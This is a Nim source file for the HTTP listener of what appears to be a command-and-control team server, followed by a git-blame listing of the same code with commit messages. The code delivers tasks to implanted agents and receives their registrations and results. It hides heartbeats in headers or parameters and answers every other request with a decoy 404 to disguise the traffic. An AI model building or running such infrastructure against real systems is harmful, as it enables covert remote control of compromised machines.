src/server/api/routes.nim

import mummy, terminal, strformat, parsetoml, tables
import strutils, base64

import ./handlers
import ../globals
import ../core/logger
import ../../common/[types, utils, serialize, profile]
import ../websocket

# Not Found
proc error404*(request: Request) =  
    request.respond(404, body = "")

# Method not allowed 
proc error405*(request: Request) = 
    request.respond(404, body = "") 

# Utils 
proc hasKey(headers: seq[(string, string)], headerName: string): bool =
    for (name, value) in headers:
        if name.toLower() == headerName.toLower():
            return true
    return false

proc get(headers: seq[(string, string)], headerName: string): string =
    for (name, value) in headers:
        if name.toLower() == headerName.toLower():
            return value
    return ""

#[
    GET
    Called from agent to check for new tasks
]#
proc httpGet*(request: Request) = 
    {.cast(gcsafe).}:

        # Check heartbeat metadata placement
        var heartbeat: seq[byte]
        var heartbeatString: string

        case cq.profile.getString("http-get.agent.heartbeat.placement.type"): 
        of "header": 
            let heartbeatHeader = cq.profile.getString("http-get.agent.heartbeat.placement.name")
            if not request.headers.hasKey(heartbeatHeader): 
                request.respond(404, body = "")
                return
            heartbeatString = request.headers.get(heartbeatHeader)

        of "parameter": 
            let param = cq.profile.getString("http-get.agent.heartbeat.placement.name")
            heartbeatString = request.queryParams.get(param)  
            if heartbeatString.len <= 0: 
                request.respond(404, body = "")
                return

        of "uri": 
            discard 
        of "body": 
            discard
        else: discard 

        # Retrieve and apply data transformation to get raw heartbeat packet
        let 
            prefix = cq.profile.getString("http-get.agent.heartbeat.prefix")
            suffix = cq.profile.getString("http-get.agent.heartbeat.suffix")
            encHeartbeat = heartbeatString[len(prefix) ..^ len(suffix) + 1]

        case cq.profile.getString("http-get.agent.heartbeat.encoding.type", default = "none"): 
        of "base64":
            heartbeat = string.toBytes(decode(encHeartbeat)) 
        of "none":
            heartbeat = string.toBytes(encHeartbeat) 

        try: 
            var responseBytes: seq[byte]
            let (agentId, tasks) = getTasks(heartbeat)

            if tasks.len <= 0: 
                request.respond(200, body = "")
                return

            # Create response, containing number of tasks, as well as length and content of each task
            # This makes it easier for the agent to parse the tasks
            responseBytes.add(cast[uint8](tasks.len))

            for task in tasks:
                responseBytes.add(uint32.toBytes(uint32(task.len))) 
                responseBytes.add(task)
            
            # Apply data transformation to the response
            var response: string
            case cq.profile.getString("http-get.server.output.encoding.type", default = "none"): 
            of "none": 
                response = Bytes.toString(responseBytes)
            of "base64":
                response = encode(responseBytes, safe = cq.profile.getBool("http-get.server.output.encoding.url-safe"))
            else: discard

            let prefix = cq.profile.getString("http-get.server.output.prefix")
            let suffix = cq.profile.getString("http-get.server.output.suffix")

            # Add headers, as defined in the team server profile 
            var headers: HttpHeaders
            for header, value in cq.profile.getTable("http-get.server.headers"):
                headers.add((header, value.getStringValue()))

            request.respond(200, headers = headers, body = prefix & response & suffix)

            # Notify operator that agent collected tasks
            cq.client.sendConsoleItem(agentId, LOG_INFO, fmt"{$response.len} bytes sent.")
            cq.info(fmt"{$response.len} bytes sent.")

        except CatchableError:
            request.respond(404, body = "")

#[
    POST 
    Called from agent to register itself or post results of a task
]#
proc httpPost*(request: Request) = 
    {.cast(gcsafe).}:

        # Check headers
        # If POST data is not binary data, return 404 error code
        if request.headers.get("Content-Type") != "application/octet-stream": 
            request.respond(404, body = "")
            return

        try:        
            # Differentiate between registration and task result packet
            var unpacker = Unpacker.init(request.body)
            let header = unpacker.deserializeHeader()

            # Add response headers, as defined in team server profile
            var headers: HttpHeaders
            for header, value in cq.profile.getTable("http-post.server.headers"):
                headers.add((header, value.getStringValue()))

            if cast[PacketType](header.packetType) == MSG_REGISTER: 
                if not register(string.toBytes(request.body), request.remoteAddress):
                    request.respond(400, body = "")
                    return

            elif cast[PacketType](header.packetType) == MSG_RESULT: 
                handleResult(string.toBytes(request.body))

            request.respond(200, body = "")

        except CatchableError:
            request.respond(404, body = "")

        return
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`import mummy, terminal, strformat, parsetoml, tables`
Implemented wrapper functions for logging and console output (info, error, success, ...) 2025-08-21 17:02:50 +02:00			`import strutils, base64`
Implemented encryption for embedded profile. 2025-08-19 20:03:34 +02:00
Updated directory structure 2025-07-16 10:33:13 +02:00			`import ./handlers`
Implemented wrapper functions for logging and console output (info, error, success, ...) 2025-08-21 17:02:50 +02:00			`import ../globals`
			`import ../core/logger`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`import ../../common/[types, utils, serialize, profile]`
Moved task parsing logic to the client to be able to support dotnet/bof commands when operating from a different machine than the team server. Disabled sequence tracking due to issues. 2025-09-30 10:04:29 +02:00			`import ../websocket`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`# Not Found`
			`proc error404*(request: Request) =`
			`request.respond(404, body = "")`

			`# Method not allowed`
			`proc error405*(request: Request) =`
			`request.respond(404, body = "")`

			`# Utils`
			`proc hasKey(headers: seq[(string, string)], headerName: string): bool =`
			`for (name, value) in headers:`
			`if name.toLower() == headerName.toLower():`
			`return true`
			`return false`

			`proc get(headers: seq[(string, string)], headerName: string): string =`
			`for (name, value) in headers:`
			`if name.toLower() == headerName.toLower():`
			`return value`
			`return ""`
Implemented listener management (start, stop, list) and database integration. 2025-05-09 12:04:14 +02:00
Started work on agent registration 2025-05-12 21:53:37 +02:00			`#[`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`GET`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`Called from agent to check for new tasks`
			`]#`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`proc httpGet*(request: Request) =`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`{.cast(gcsafe).}:`
Updated C2 communication to hide heartbeat data in JWT token. 2025-08-13 13:38:39 +02:00
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`# Check heartbeat metadata placement`
			`var heartbeat: seq[byte]`
			`var heartbeatString: string`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`case cq.profile.getString("http-get.agent.heartbeat.placement.type"):`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`of "header":`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`let heartbeatHeader = cq.profile.getString("http-get.agent.heartbeat.placement.name")`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`if not request.headers.hasKey(heartbeatHeader):`
			`request.respond(404, body = "")`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`return`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`heartbeatString = request.headers.get(heartbeatHeader)`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
			`of "parameter":`
Added more randomization. The profile now supports setting keys to an array of strings, from which a random one is chosen each time (useful for e.g. Host header, etc.) 2025-08-17 16:27:48 +02:00			`let param = cq.profile.getString("http-get.agent.heartbeat.placement.name")`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`heartbeatString = request.queryParams.get(param)`
Added more randomization. The profile now supports setting keys to an array of strings, from which a random one is chosen each time (useful for e.g. Host header, etc.) 2025-08-17 16:27:48 +02:00			`if heartbeatString.len <= 0:`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(404, body = "")`
Added more randomization. The profile now supports setting keys to an array of strings, from which a random one is chosen each time (useful for e.g. Host header, etc.) 2025-08-17 16:27:48 +02:00			`return`

Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`of "uri":`
			`discard`
			`of "body":`
			`discard`
			`else: discard`

			`# Retrieve and apply data transformation to get raw heartbeat packet`
Implemented server output encoding for task retrieval. 2025-08-17 17:01:50 +02:00			`let`
			`prefix = cq.profile.getString("http-get.agent.heartbeat.prefix")`
			`suffix = cq.profile.getString("http-get.agent.heartbeat.suffix")`
			`encHeartbeat = heartbeatString[len(prefix) ..^ len(suffix) + 1]`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`case cq.profile.getString("http-get.agent.heartbeat.encoding.type", default = "none"):`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`of "base64":`
			`heartbeat = string.toBytes(decode(encHeartbeat))`
			`of "none":`
			`heartbeat = string.toBytes(encHeartbeat)`

			`try:`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`var responseBytes: seq[byte]`
Moved task parsing logic to the client to be able to support dotnet/bof commands when operating from a different machine than the team server. Disabled sequence tracking due to issues. 2025-09-30 10:04:29 +02:00			`let (agentId, tasks) = getTasks(heartbeat)`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
			`if tasks.len <= 0:`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(200, body = "")`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`return`

			`# Create response, containing number of tasks, as well as length and content of each task`
			`# This makes it easier for the agent to parse the tasks`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`responseBytes.add(cast[uint8](tasks.len))`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
			`for task in tasks:`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`responseBytes.add(uint32.toBytes(uint32(task.len)))`
			`responseBytes.add(task)`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`# Apply data transformation to the response`
			`var response: string`
Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`case cq.profile.getString("http-get.server.output.encoding.type", default = "none"):`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`of "none":`
			`response = Bytes.toString(responseBytes)`
			`of "base64":`
			`response = encode(responseBytes, safe = cq.profile.getBool("http-get.server.output.encoding.url-safe"))`
			`else: discard`

Added profile system to agent communication. Randomized URL endpoints/request methods and dynamic data transformation based on C2 profile. Profile is defined as compile-time string for now. 2025-08-15 15:42:57 +02:00			`let prefix = cq.profile.getString("http-get.server.output.prefix")`
			`let suffix = cq.profile.getString("http-get.server.output.suffix")`

Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`# Add headers, as defined in the team server profile`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`var headers: HttpHeaders`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`for header, value in cq.profile.getTable("http-get.server.headers"):`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`headers.add((header, value.getStringValue()))`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(200, headers = headers, body = prefix & response & suffix)`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
			`# Notify operator that agent collected tasks`
Moved task parsing logic to the client to be able to support dotnet/bof commands when operating from a different machine than the team server. Disabled sequence tracking due to issues. 2025-09-30 10:04:29 +02:00			`cq.client.sendConsoleItem(agentId, LOG_INFO, fmt"{$response.len} bytes sent.")`
Implemented wrapper functions for logging and console output (info, error, success, ...) 2025-08-21 17:02:50 +02:00			`cq.info(fmt"{$response.len} bytes sent.")`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`except CatchableError:`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(404, body = "")`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Started work on agent registration 2025-05-12 21:53:37 +02:00			`#[`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`POST`
			`Called from agent to register itself or post results of a task`
Started work on agent registration 2025-05-12 21:53:37 +02:00			`]#`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`proc httpPost*(request: Request) =`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`{.cast(gcsafe).}:`

			`# Check headers`
			`# If POST data is not binary data, return 404 error code`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`if request.headers.get("Content-Type") != "application/octet-stream":`
			`request.respond(404, body = "")`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`return`

			`try:`
			`# Differentiate between registration and task result packet`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`var unpacker = Unpacker.init(request.body)`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`let header = unpacker.deserializeHeader()`

			`# Add response headers, as defined in team server profile`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`var headers: HttpHeaders`
Improved working with profiles by adding helper retrieval functions. 2025-08-14 19:33:32 +02:00			`for header, value in cq.profile.getTable("http-post.server.headers"):`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`headers.add((header, value.getStringValue()))`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
			`if cast[PacketType](header.packetType) == MSG_REGISTER:`
Added remote address and modules to agent structure. Help command now only shows commands for which the agent has been configured. 2025-10-02 10:25:37 +02:00			`if not register(string.toBytes(request.body), request.remoteAddress):`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(400, body = "")`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`return`

			`elif cast[PacketType](header.packetType) == MSG_RESULT:`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`handleResult(string.toBytes(request.body))`
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(200, body = "")`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`except CatchableError:`
Replaced prologue implementation with mummy for listener management, since it seems more suitable for future use (websockets, etc.). 2025-09-19 18:31:45 +02:00			`request.respond(404, body = "")`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Updated profile system, including dynamic parsing of hidden heartbeats and setting of response headers. 2025-08-14 15:53:58 +02:00			`return`